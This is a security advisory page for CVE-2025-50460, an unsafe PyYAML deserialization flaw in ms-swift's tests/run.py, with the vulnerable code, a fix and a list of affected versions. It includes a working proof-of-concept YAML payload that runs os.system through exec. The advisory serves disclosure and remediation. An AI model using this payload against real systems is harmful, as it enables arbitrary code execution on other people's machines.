GHSA-fm6c-f59h-7mmg
Suggest an improvement- Source
- https://github.com/advisories/GHSA-fm6c-f59h-7mmg
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/07/GHSA-fm6c-f59h-7mmg/GHSA-fm6c-f59h-7mmg.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-fm6c-f59h-7mmg
- Aliases
-
- CVE-2025-50460
- Published
- 2025-07-31T14:02:34Z
- Modified
- 2026-05-04T08:57:29.891031634Z
- Severity
-
- 9.8 (Critical) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H CVSS Calculator
- 2.3 (Low) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N CVSS Calculator
- Summary
- MS SWIFT Remote Code Execution via unsafe PyYAML deserialization
- Details
-
Description
A Remote Code Execution (RCE) vulnerability exists in the modelscope/ms-swift project due to unsafe use of
yaml.load()in combination with vulnerable versions of the PyYAML library (≤ 5.3.1). The issue resides in thetests/run.pyscript, where a user-supplied YAML configuration file is deserialized usingyaml.load()withyaml.FullLoader.If an attacker can control or replace the YAML configuration file provided to the
--run_configargument, they may inject a malicious payload that results in arbitrary code execution.Affected Repository
- Project: modelscope/ms-swift
- Affect versions: latest
- File:
tests/run.py - GitHub Permalink: https://github.com/modelscope/ms-swift/blob/e02ebfdf34f979bbdba9d935acc1689f8d227b38/tests/run.py#L420
- Dependency: PyYAML <= 5.3.1
Vulnerable Code
if args.run_config is not None and Path(args.run_config).exists(): with open(args.run_config, encoding='utf-8') as f: run_config = yaml.load(f, Loader=yaml.FullLoader)Proof of Concept (PoC)
Step 1: Create malicious YAML file (
exploit.yaml)!!python/object/new:type args: ["z", !!python/tuple [], {"extend": !!python/name:exec }] listitems: "__import__('os').system('mkdir HACKED')"Step 2: Execute with vulnerable PyYAML (<= 5.3.1)
import yaml with open("exploit.yaml", "r") as f: cfg = yaml.load(f, Loader=yaml.FullLoader)This results in execution of
os.system, proving code execution.Mitigation
- Replace
yaml.load()withyaml.safe_load() - Upgrade PyYAML to version 5.4 or later
Example Fix:
# Before yaml.load(f, Loader=yaml.FullLoader) # After yaml.safe_load(f)Author
- Discovered by: Yu Rong (戎誉) and Hao Fan (凡浩)
- Contact: [anchor.rongyu020221@gmail.com]
- Database specific
{ "nvd_published_at": "2025-08-01T16:15:41Z", "cwe_ids": [ "CWE-502" ], "github_reviewed": true, "github_reviewed_at": "2025-07-31T14:02:34Z", "severity": "LOW" }- References
-
- https://github.com/modelscope/ms-swift/security/advisories/GHSA-fm6c-f59h-7mmg
- https://nvd.nist.gov/vuln/detail/CVE-2025-50460
- https://github.com/modelscope/ms-swift/pull/5174
- https://github.com/modelscope/ms-swift/commit/b3418ed9b050dc079553c275c5ed14cfb2b66cf7
- https://github.com/Anchor0221/CVE-2025-50460
- https://github.com/advisories/GHSA-6757-jp84-gxfx
- https://github.com/modelscope/ms-swift
- https://github.com/modelscope/ms-swift/blob/main/tests/run.py#L420
Affected packages
PyPI / ms-swift
Package
- Name
- ms-swift
- View open source insights on deps.dev
- Purl
- pkg:pypi/ms-swift
Affected ranges
- Type
- ECOSYSTEM
- Events
-
Introduced0Unknown introduced version / All previous versions are affectedLast affected3.6.3
Affected versions
1.*
1.0.0
1.1.0
1.2.0
1.2.1
1.3.0
1.4.0
1.5.0
1.5.1
1.5.2
1.5.3
1.5.4
1.6.0
1.6.1
1.6.2
1.6.3
1.7.0
1.7.1
1.7.2
1.7.3
2.*
2.0.0
2.0.1
2.0.2
2.0.3
2.0.3.post1
2.0.4
2.0.5
2.0.5.post1
2.1.0
2.1.1
2.1.1.post1
2.1.1.post2
2.2.0
2.2.1
2.2.2
2.2.3
2.2.4
2.2.5
2.3.0
2.3.0.post1
2.3.1
2.3.2
2.3.2.post1
2.4.0
2.4.0.post1
2.4.1
2.4.2
2.4.2.post1
2.4.2.post2
2.5.0.post1
2.5.1
2.5.1.post1
2.5.2
2.5.2.post1
2.6.0
2.6.0.post1
2.6.0.post2
2.6.1
3.*
3.0.0
3.0.1
3.0.1.post1
3.0.2
3.0.2.post1
3.0.3
3.1.0
3.1.1
3.1.1.post1
3.2.0
3.2.0.post2
3.2.1
3.2.2
3.3.0
3.3.0.post1
3.3.1
3.4.0
3.4.1
3.4.1.post1
3.5.0
3.5.1
3.5.2
3.5.3
3.6.0
3.6.1
3.6.2
3.6.3